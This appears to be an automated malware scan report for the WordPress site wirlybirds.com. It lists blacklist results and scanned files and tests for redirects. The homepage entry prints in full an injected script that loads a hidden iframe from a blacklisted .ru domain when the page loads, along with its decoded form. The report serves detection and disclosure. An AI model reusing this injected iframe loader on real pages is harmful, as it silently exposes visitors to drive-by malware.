Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wirlybirds.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wirlybirds.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://wirlybirds.com/ | 200 OK Content-Length: 35287 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('72py');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="72py";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function njbqotg(){create_frame("http://rabiorik.ru/qcwagre.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',njbqotg)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();njbqotg()};window.onload=newonload}else{window.onload=njbqotg}}}catch(err){} Decoded script: function njbqotg() { create_frame("http://rabiorik.ru/qcwagre.cgi?default"); } | ||
http://wirlybirds.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/jquery-1.4.min.js?ver=1.4.2 | 200 OK Content-Length: 70091 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/plugins/megatables/sprites/js/jquery.megatables.js?ver=0.1 | 200 OK Content-Length: 2334 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/base.js | 200 OK Content-Length: 12773 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/toolTipOptions.min.js | 200 OK Content-Length: 12938 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/ribbonScroll.js | 200 OK Content-Length: 1477 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/jquery.overlabel.min.js | 200 OK Content-Length: 1036 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/scrollTo.min.js | 200 OK Content-Length: 3699 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/jquery.fancybox-1.3.1.pack.js | 200 OK Content-Length: 14731 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/jquery.cycle.all.min.js | 200 OK Content-Length: 23729 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/LiberationSans.font.js | 200 OK Content-Length: 148628 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-content/themes/parallelus-unite/js/onLoad.js | 200 OK Content-Length: 4504 Content-Type: application/javascript | clean |
http://wirlybirds.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 2400 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wirlybirds.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:39:26 GMT
Server: Apache
Content-Length: 35287
Content-Type: text/html; charset=UTF-8
X-Pingback: http://wirlybirds.com/xmlrpc.php
X-Powered-By: PHP/5.4.33
...35287 bytes of data.
GET / HTTP/1.1
Host: wirlybirds.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:39:26 GMT
Server: Apache
Content-Length: 35287
Content-Type: text/html; charset=UTF-8
X-Pingback: http://wirlybirds.com/xmlrpc.php
X-Powered-By: PHP/5.4.33
...35287 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wirlybirds.com
Referer: http://www.google.com/search?q=wirlybirds.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wirlybirds.com
Referer: http://www.google.com/search?q=wirlybirds.com
Result:
The result is similar to the first query. There are no suspicious redirects found.